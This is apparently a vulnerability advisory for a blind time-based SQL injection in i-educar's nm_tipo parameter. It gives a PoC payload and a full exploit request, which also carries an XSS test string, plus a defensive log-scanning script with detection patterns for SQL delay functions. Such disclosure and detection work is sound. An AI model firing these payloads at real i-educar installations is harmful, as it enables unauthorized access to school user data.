CVE-2025-9236: SQL Injection (Blind Time-Based) Vulnerability in nm_tipo Parameter on educar_tipo_usuario_lst.php Endpoint
CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9236
Summary
A SQL Injection vulnerability was discovered in the nm_tipo parameter of the educar_tipo_usuario_lst.php endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.
Details
The application fails to properly sanitize user-supplied input in the nm_tipo parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.
PoC
Vulnerable Endpoint: educar_tipo_usuario_lst.php
Parameter: nm_tipo
Payload:
' AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR 'EgwO'='pMdZ
Example Request
GET /intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=1'%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'EgwO'%3D'pMdZ&descricao=1&nivel=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&descricao=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&nivel=-1
Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.

Observe the time delay in the server response, indicating the successful execution of the SQL payload.
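For defenders, one way to search web server access logs for this request pattern, as an added example that is not part of the original advisory or the i-educar code base. The log lines are constructed samples in combined log format, the function names are hypothetical, and the delay-function list goes beyond the PG_SLEEP call shown above to cover the equivalent primitives of other databases.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Sep/2025:10:00:01 +0000] "GET /intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=Professor&descricao=1&nivel=1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Sep/2025:10:00:07 +0000] "GET /intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=1'%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'EgwO'%3D'pMdZ&descricao=1&nivel=1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Sep/2025:10:00:31 +0000] "GET /intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=1%2527%2520AND%2520pg_sleep%25285%2529-- HTTP/1.1" 200 5120
198.51.100.4 - - [01/Sep/2025:10:01:02 +0000] "GET /intranet/index.php?q=pg_sleep(1) HTTP/1.1" 200 900
""".splitlines()

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Time-delay primitives: PostgreSQL, MySQL, SQL Server (assumed list, extend as needed).
DELAY_RE = re.compile(r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\(", re.I)
ENDPOINT = "/educar_tipo_usuario_lst.php"

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding; a proxy log may hold %2527 instead of %27."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_delay_injection(lines, endpoint=ENDPOINT):
    """Return (client_ip, parameter, decoded_value) for each suspicious parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(endpoint):
            continue  # scope the search to the affected endpoint
        # parse_qsl decodes once; fully_decode handles any further layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if DELAY_RE.search(value):
                hits.append((client, name, value))
    return hits

if __name__ == "__main__":
    for client, name, value in find_delay_injection(SAMPLE_LOG):
        print(f"{client} {name}={value!r}")
```

A match is a lead for triage rather than proof of execution; where the server logs request duration, a response time close to the requested delay indicates the injected query ran.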
Impact
- Unauthorized access to sensitive data (e.g., users, passwords, logs).
- Database enumeration (schemas, tables, users, versions).
- Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
- Full compromise of the application if chained with other vulnerabilities.
- This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.
Reference
https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md
Finder
Marcelo Queiroz
By: CVE-Hunters